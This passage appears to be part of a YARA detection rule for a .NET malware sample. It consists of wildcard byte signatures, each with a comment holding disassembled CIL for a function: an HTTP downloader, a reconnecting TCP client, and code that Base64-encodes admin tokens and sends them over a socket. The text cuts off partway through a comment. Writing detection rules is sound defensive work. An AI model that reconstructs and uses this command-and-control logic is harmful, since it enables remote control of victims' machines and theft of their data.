?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 20 ?? ?? ?? ?? 17 17 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6A 0C 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 08 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 26 07 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 6F ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 16 6A 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 04 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 11 ?? 7B ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 58 13 ?? 11 ?? 18 6A 58 13 ?? 11 ?? 11 ?? 8E 69 6A 58 13 ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 6A 58 13 ?? 11 ?? 18 6A 58 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 05 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 7B ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 18 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1F ?? 9C 11 ?? 17 1F ?? 9C 11 ?? 16 18 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? DE ?? 26 DE ?? 06 2A } + /* +function WebDL.WebDL::_down1 0x0600009b@1c444ebeba24dcba8628b7dfe5fec7c6 with 6 features: + - check if file exists + - create HTTP request + - manipulate console buffer + - receive HTTP response + - send HTTP request + - send data + 3144 72 01 00 00 70 ldstr "" + 3149 0a stloc.0 + 314A 02 ldarg.0 + 314B 04 ldarg.2 + 314C 28 99 00 00 06 call _getName + 3151 0b stloc.1 + 3152 07 ldloc.1 + 3153 72 01 00 00 70 ldstr "" + 3158 28 bd 00 00 0a call System.String::op_Equality + 315D 2c 08 brfalse.s 0x3167 + 315F 06 ldloc.0 + 3160 13 0a stloc.s local(0x000A) + 3162 dd c3 00 00 00 leave 0x322a + 3167 03 ldarg.1 + 3168 07 ldloc.1 + 3169 28 60 00 00 0a call System.IO.Path::Combine + 316E 0c stloc.2 + 316F 08 ldloc.2 + 3170 28 be 00 00 0a call System.Console::WriteLine + 3175 17 ldc.i4.1 + 3176 0d stloc.3 + 3177 2b 1c br.s 0x3195 + 3179 03 ldarg.1 + 317A 09 ldloc.3 + 317B 8c 32 00 00 01 box System.Int32 + 3180 72 13 02 00 70 ldstr "_" + 3185 07 ldloc.1 + 3186 28 28 00 00 0a call System.String::Concat + 318B 28 60 00 00 0a call System.IO.Path::Combine + 3190 0c stloc.2 + 3191 09 ldloc.3 + 3192 17 ldc.i4.1 + 3193 58 add + 3194 0d stloc.3 + 3195 08 ldloc.2 + 3196 28 bf 00 00 0a call System.IO.File::Exists + 319B 2d dc brtrue.s 0x3179 + 319D 08 ldloc.2 + 319E 28 c0 00 00 0a call System.IO.File::OpenWrite + 31A3 13 04 stloc.s local(0x0004) + 31A5 20 00 00 10 00 ldc.i4 0x100000 + 31AA 8d 3d 00 00 01 newarr System.Byte + 31AF 13 05 stloc.s local(0x0005) + 31B1 04 ldarg.2 + 31B2 28 97 00 00 0a call System.Net.WebRequest::Create + 31B7 75 58 00 00 01 isinst System.Net.HttpWebRequest + 31BC 13 06 stloc.s local(0x0006) + 31BE 11 06 ldloc.s local(0x0006) + 31C0 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 31C5 75 67 00 00 01 isinst System.Net.HttpWebResponse + 31CA 13 07 stloc.s local(0x0007) + 31CC 11 07 ldloc.s local(0x0007) + 31CE 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 31D3 13 08 stloc.s local(0x0008) + 31D5 11 08 ldloc.s local(0x0008) + 31D7 11 05 ldloc.s local(0x0005) + 31D9 16 ldc.i4.0 + 31DA 11 05 ldloc.s local(0x0005) + 31DC 8e ldlen + 31DD 69 conv.i4 + 31DE 6f 84 00 00 0a callvirt System.IO.Stream::Read + 31E3 13 09 stloc.s local(0x0009) + 31E5 2b 1c br.s 0x3203 + 31E7 11 04 ldloc.s local(0x0004) + 31E9 11 05 ldloc.s local(0x0005) + 31EB 16 ldc.i4.0 + 31EC 11 09 ldloc.s local(0x0009) + 31EE 6f 89 00 00 0a callvirt System.IO.Stream::Write + 31F3 11 08 ldloc.s local(0x0008) + 31F5 11 05 ldloc.s local(0x0005) + 31F7 16 ldc.i4.0 + 31F8 11 05 ldloc.s local(0x0005) + 31FA 8e ldlen + 31FB 69 conv.i4 + 31FC 6f 84 00 00 0a callvirt System.IO.Stream::Read + 3201 13 09 stloc.s local(0x0009) + 3203 11 09 ldloc.s local(0x0009) + 3205 16 ldc.i4.0 + 3206 30 df bgt.s 0x31e7 + 3208 11 08 ldloc.s local(0x0008) + 320A 6f b2 00 00 0a callvirt System.IO.Stream::Close + 320F 11 07 ldloc.s local(0x0007) + 3211 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 3216 11 04 ldloc.s local(0x0004) + 3218 6f b2 00 00 0a callvirt System.IO.Stream::Close + 321D 72 17 02 00 70 ldstr "OK" + 3222 0a stloc.0 + 3223 de 03 leave.s 0x3228 + 3225 26 pop + 3226 de 00 leave.s 0x3228 + 3228 06 ldloc.0 + 3229 2a ret + 322A 11 0a ldloc.s local(0x000A) + 322C 2a ret + */ + $c3 = { 72 ?? ?? ?? ?? 0A 02 04 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 13 ?? DD ?? ?? ?? ?? 03 07 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 17 0D 2B ?? 03 09 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 09 17 58 0D 08 28 ?? ?? ?? ?? 2D ?? 08 28 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 04 28 ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 75 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 30 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 0A DE ?? 26 DE ?? 06 2A 11 ?? 2A } + /* +function Sockets.MySocket::<.ctor>b__0 0x0600008a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - act as TCP client + 2394 20 f4 01 00 00 ldc.i4 0x1f4 + 2399 28 6a 00 00 0a call System.Threading.Thread::Sleep + 239E 20 00 00 a0 00 ldc.i4 0xa00000 + 23A3 8d 3d 00 00 01 newarr System.Byte + 23A8 0a stloc.0 + 23A9 38 11 01 00 00 br 0x24bf + 23AE 02 ldarg.0 + 23AF 7b 8a 00 00 04 ldfld _tcpClient + 23B4 3a 9d 00 00 00 brtrue 0x2456 + 23B9 02 ldarg.0 + 23BA 73 7d 00 00 0a newobj System.Net.Sockets.TcpClient::.ctor + 23BF 7d 8a 00 00 04 stfld _tcpClient + 23C4 02 ldarg.0 + 23C5 7b 8a 00 00 04 ldfld _tcpClient + 23CA 20 00 00 a0 00 ldc.i4 0xa00000 + 23CF 6f 7e 00 00 0a callvirt System.Net.Sockets.TcpClient::set_SendBufferSize + 23D4 02 ldarg.0 + 23D5 7b 8a 00 00 04 ldfld _tcpClient + 23DA 20 00 00 a0 00 ldc.i4 0xa00000 + 23DF 6f 7f 00 00 0a callvirt System.Net.Sockets.TcpClient::set_ReceiveBufferSize + 23E4 02 ldarg.0 + 23E5 7b 8a 00 00 04 ldfld _tcpClient + 23EA 02 ldarg.0 + 23EB 7b 8e 00 00 04 ldfld __host + 23F0 02 ldarg.0 + 23F1 7b 8f 00 00 04 ldfld __port + 23F6 6f 80 00 00 0a callvirt System.Net.Sockets.TcpClient::Connect + 23FB 02 ldarg.0 + 23FC 02 ldarg.0 + 23FD 7b 8a 00 00 04 ldfld _tcpClient + 2402 6f 81 00 00 0a callvirt System.Net.Sockets.TcpClient::GetStream + 2407 7d 8b 00 00 04 stfld _networkStream + 240C 02 ldarg.0 + 240D 17 ldc.i4.1 + 240E 7d 89 00 00 04 stfld isConnected + 2413 02 ldarg.0 + 2414 7b 90 00 00 04 ldfld onConnected + 2419 2c 11 brfalse.s 0x242c + 241B 02 ldarg.0 + 241C 7b 90 00 00 04 ldfld onConnected + 2421 02 ldarg.0 + 2422 7b 89 00 00 04 ldfld isConnected + 2427 6f 82 00 00 0a callvirt Invoke + 242C de 28 leave.s 0x2456 + 242E 26 pop + 242F 02 ldarg.0 + 2430 16 ldc.i4.0 + 2431 7d 89 00 00 04 stfld isConnected + 2436 02 ldarg.0 + 2437 14 ldnull + 2438 7d 8a 00 00 04 stfld _tcpClient + 243D 02 ldarg.0 + 243E 14 ldnull + 243F 7d 8b 00 00 04 stfld _networkStream + 2444 28 83 00 00 0a call System.GC::Collect + 2449 02 ldarg.0 + 244A 7b 88 00 00 04 ldfld reConnectionDelay + 244F 28 6a 00 00 0a call System.Threading.Thread::Sleep + 2454 de 00 leave.s 0x2456 + 2456 02 ldarg.0 + 2457 7b 8b 00 00 04 ldfld _networkStream + 245C 2c 37 brfalse.s 0x2495 + 245E 02 ldarg.0 + 245F 7b 8b 00 00 04 ldfld _networkStream + 2464 06 ldloc.0 + 2465 16 ldc.i4.0 + 2466 06 ldloc.0 + 2467 8e ldlen + 2468 69 conv.i4 + 2469 6f 84 00 00 0a callvirt System.IO.Stream::Read + 246E 0b stloc.1 + 246F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2474 06 ldloc.0 + 2475 16 ldc.i4.0 + 2476 07 ldloc.1 + 2477 6f 85 00 00 0a callvirt System.Text.Encoding::GetString + 247C 0c stloc.2 + 247D 07 ldloc.1 + 247E 16 ldc.i4.0 + 247F 31 14 ble.s 0x2495 + 2481 02 ldarg.0 + 2482 7b 91 00 00 04 ldfld onData + 2487 2c 0c brfalse.s 0x2495 + 2489 02 ldarg.0 + 248A 7b 91 00 00 04 ldfld onData + 248F 08 ldloc.2 + 2490 6f 6c 00 00 0a callvirt Invoke + 2495 de 21 leave.s 0x24b8 + 2497 26 pop + 2498 02 ldarg.0 + 2499 14 ldnull + 249A 7d 8a 00 00 04 stfld _tcpClient + 249F 02 ldarg.0 + 24A0 14 ldnull + 24A1 7d 8b 00 00 04 stfld _networkStream + 24A6 28 83 00 00 0a call System.GC::Collect + 24AB 02 ldarg.0 + 24AC 7b 88 00 00 04 ldfld reConnectionDelay + 24B1 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24B6 de 00 leave.s 0x24b8 + 24B8 1f 0a ldc.i4.s 0xa + 24BA 28 6a 00 00 0a call System.Threading.Thread::Sleep + 24BF 02 ldarg.0 + 24C0 7b 8d 00 00 04 ldfld _isRunning + 24C5 3a e4 fe ff ff brtrue 0x23ae + 24CA 2a ret + */ + $c4 = { 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 38 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 02 16 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 16 06 8E 69 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 06 16 07 6F ?? ?? ?? ?? 0C 07 16 31 ?? 02 7B ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? DE ?? 26 02 14 7D ?? ?? ?? ?? 02 14 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 3A ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__1 0x06000023@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - decode data using Base64 in .NET + 07FA 02 ldarg.0 + 07FB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0800 02 ldarg.0 + 0801 7b 9d 00 00 04 ldfld _text1 + 0806 28 47 00 00 0a call System.Convert::FromBase64String + 080B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 0810 7d 9d 00 00 04 stfld _text1 + 0815 2a ret + */ + $c5 = { 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function test_A1.Form1::b__14 0x0600001b@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 04D8 02 ldarg.0 + 04D9 7b 23 00 00 04 ldfld mySocket + 04DE 17 ldc.i4.1 + 04DF 8c 32 00 00 01 box System.Int32 + 04E4 72 23 00 00 70 ldstr "|" + 04E9 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 04EE 7e 22 00 00 04 ldsfld _TOKEN_ + 04F3 72 23 00 00 70 ldstr "|" + 04F8 16 ldc.i4.0 + 04F9 8c 32 00 00 01 box System.Int32 + 04FE 28 28 00 00 0a call System.String::Concat + 0503 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0508 28 2b 00 00 0a call System.Convert::ToBase64String + 050D 28 28 00 00 0a call System.String::Concat + 0512 6f 88 00 00 06 callvirt Send + 0517 26 pop + 0518 2a ret + */ + $c6 = { 02 7B ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__6 0x06000028@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0884 02 ldarg.0 + 0885 1c ldc.i4.6 + 0886 8d 01 00 00 01 newarr System.Object + 088B 0a stloc.0 + 088C 06 ldloc.0 + 088D 16 ldc.i4.0 + 088E 20 a0 86 01 00 ldc.i4 0x186a0 + 0893 8c 32 00 00 01 box System.Int32 + 0898 a2 stelem.ref + 0899 06 ldloc.0 + 089A 17 ldc.i4.1 + 089B 72 23 00 00 70 ldstr "|" + 08A0 a2 stelem.ref + 08A1 06 ldloc.0 + 08A2 18 ldc.i4.2 + 08A3 02 ldarg.0 + 08A4 7b 98 00 00 04 ldfld _adm_token + 08A9 a2 stelem.ref + 08AA 06 ldloc.0 + 08AB 19 ldc.i4.3 + 08AC 72 23 00 00 70 ldstr "|" + 08B1 a2 stelem.ref + 08B2 06 ldloc.0 + 08B3 1a ldc.i4.4 + 08B4 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 08B9 02 ldarg.0 + 08BA 7b 9e 00 00 04 ldfld _temp_dir1 + 08BF 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 08C4 28 2b 00 00 0a call System.Convert::ToBase64String + 08C9 a2 stelem.ref + 08CA 06 ldloc.0 + 08CB 1b ldc.i4.5 + 08CC 72 23 00 00 70 ldstr "|" + 08D1 a2 stelem.ref + 08D2 06 ldloc.0 + 08D3 28 49 00 00 0a call System.String::Concat + 08D8 7d 97 00 00 04 stfld _socket_res + 08DD 2a ret + */ + $c7 = { 02 1C 8D ?? ?? ?? ?? 0A 06 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 06 17 72 ?? ?? ?? ?? A2 06 18 02 7B ?? ?? ?? ?? A2 06 19 72 ?? ?? ?? ?? A2 06 1A 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 06 1B 72 ?? ?? ?? ?? A2 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__a 0x0600002c@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 09B4 02 ldarg.0 + 09B5 25 dup + 09B6 7b 97 00 00 04 ldfld _socket_res + 09BB 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 09C0 02 ldarg.0 + 09C1 7b a1 00 00 04 ldfld _res2 + 09C6 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 09CB 28 2b 00 00 0a call System.Convert::ToBase64String + 09D0 28 50 00 00 0a call System.String::Concat + 09D5 7d 97 00 00 04 stfld _socket_res + 09DA 2a ret + */ + $c8 = { 02 25 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function <>c__DisplayClassa1::b__33 0x060000a0@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - encode data using Base64 + 0F20 1b ldc.i4.5 + 0F21 8d 01 00 00 01 newarr System.Object + 0F26 0b stloc.1 + 0F27 07 ldloc.1 + 0F28 16 ldc.i4.0 + 0F29 20 50 34 03 00 ldc.i4 0x33450 + 0F2E 8c 32 00 00 01 box System.Int32 + 0F33 a2 stelem.ref + 0F34 07 ldloc.1 + 0F35 17 ldc.i4.1 + 0F36 72 23 00 00 70 ldstr "|" + 0F3B a2 stelem.ref + 0F3C 07 ldloc.1 + 0F3D 18 ldc.i4.2 + 0F3E 7e 28 00 00 04 ldsfld _1_shll_ + 0F43 7b 87 00 00 04 ldfld _adm_token + 0F48 a2 stelem.ref + 0F49 07 ldloc.1 + 0F4A 19 ldc.i4.3 + 0F4B 72 23 00 00 70 ldstr "|" + 0F50 a2 stelem.ref + 0F51 07 ldloc.1 + 0F52 1a ldc.i4.4 + 0F53 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 0F58 03 ldarg.1 + 0F59 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 0F5E 28 2b 00 00 0a call System.Convert::ToBase64String + 0F63 a2 stelem.ref + 0F64 07 ldloc.1 + 0F65 28 49 00 00 0a call System.String::Concat + 0F6A 0a stloc.0 + 0F6B 06 ldloc.0 + 0F6C 72 01 00 00 70 ldstr "" + 0F71 28 2c 00 00 0a call System.String::op_Inequality + 0F76 2c 0d brfalse.s 0xf85 + 0F78 02 ldarg.0 + 0F79 7b b0 00 00 04 ldfld mySocket + 0F7E 06 ldloc.0 + 0F7F 6f 88 00 00 06 callvirt Send + 0F84 26 pop + 0F85 2a ret + */ + $c9 = { 1B 8D ?? ?? ?? ?? 0B 07 16 20 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 07 17 72 ?? ?? ?? ?? A2 07 18 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? A2 07 19 72 ?? ?? ?? ?? A2 07 1A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 26 2A } + /* +function Funcss.Funcs::CreateMD5 0x0600001d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - hash data with MD5 + 071C 28 3a 00 00 0a call System.Security.Cryptography.MD5::Create + 0721 0a stloc.0 + 0722 28 3b 00 00 0a call System.Text.Encoding::get_ASCII + 0727 02 ldarg.0 + 0728 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 072D 0b stloc.1 + 072E 06 ldloc.0 + 072F 07 ldloc.1 + 0730 6f 3c 00 00 0a callvirt System.Security.Cryptography.HashAlgorithm::ComputeHash + 0735 0c stloc.2 + 0736 73 3d 00 00 0a newobj System.Text.StringBuilder::.ctor + 073B 0d stloc.3 + 073C 16 ldc.i4.0 + 073D 13 04 stloc.s local(0x0004) + 073F 2b 1f br.s 0x760 + 0741 09 ldloc.3 + 0742 08 ldloc.2 + 0743 11 04 ldloc.s local(0x0004) + 0745 8f 3d 00 00 01 ldelema System.Byte + 074A 72 33 00 00 70 ldstr "x2" + 074F 28 3e 00 00 0a call System.Byte::ToString + 0754 6f 3f 00 00 0a callvirt System.Text.StringBuilder::Append + 0759 26 pop + 075A 11 04 ldloc.s local(0x0004) + 075C 17 ldc.i4.1 + 075D 58 add + 075E 13 04 stloc.s local(0x0004) + 0760 11 04 ldloc.s local(0x0004) + 0762 08 ldloc.2 + 0763 8e ldlen + 0764 69 conv.i4 + 0765 32 da blt.s 0x741 + 0767 09 ldloc.3 + 0768 6f 40 00 00 0a callvirt System.Object::ToString + 076D 13 05 stloc.s local(0x0005) + 076F de 0a leave.s 0x77b + 0771 06 ldloc.0 + 0772 2c 06 brfalse.s 0x77a + 0774 06 ldloc.0 + 0775 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 077A dc endfinally + 077B 11 05 ldloc.s local(0x0005) + 077D 2a ret + */ + $c10 = { 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 16 13 ?? 2B ?? 09 08 11 ?? 8F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 32 ?? 09 6F ?? ?? ?? ?? 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 11 ?? 2A } + /* +function Reqss.Reqss::b__49 0x06000069@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - get common file path + 12C3 02 ldarg.0 + 12C4 1f 1a ldc.i4.s 0x1a + 12C6 28 5f 00 00 0a call System.Environment::GetFolderPath + 12CB 7d 9e 00 00 04 stfld _temp_dir1 + 12D0 2a ret + */ + $c11 = { 02 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__18 0x0600003a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create directory + 0BC4 02 ldarg.0 + 0BC5 7b 9e 00 00 04 ldfld _temp_dir1 + 0BCA 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 0BCF 26 pop + 0BD0 de 03 leave.s 0xbd5 + 0BD2 26 pop + 0BD3 de 00 leave.s 0xbd5 + 0BD5 2a ret + */ + $c12 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A } + /* +function Reqss.Reqss::b__4b 0x0600006b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - check if 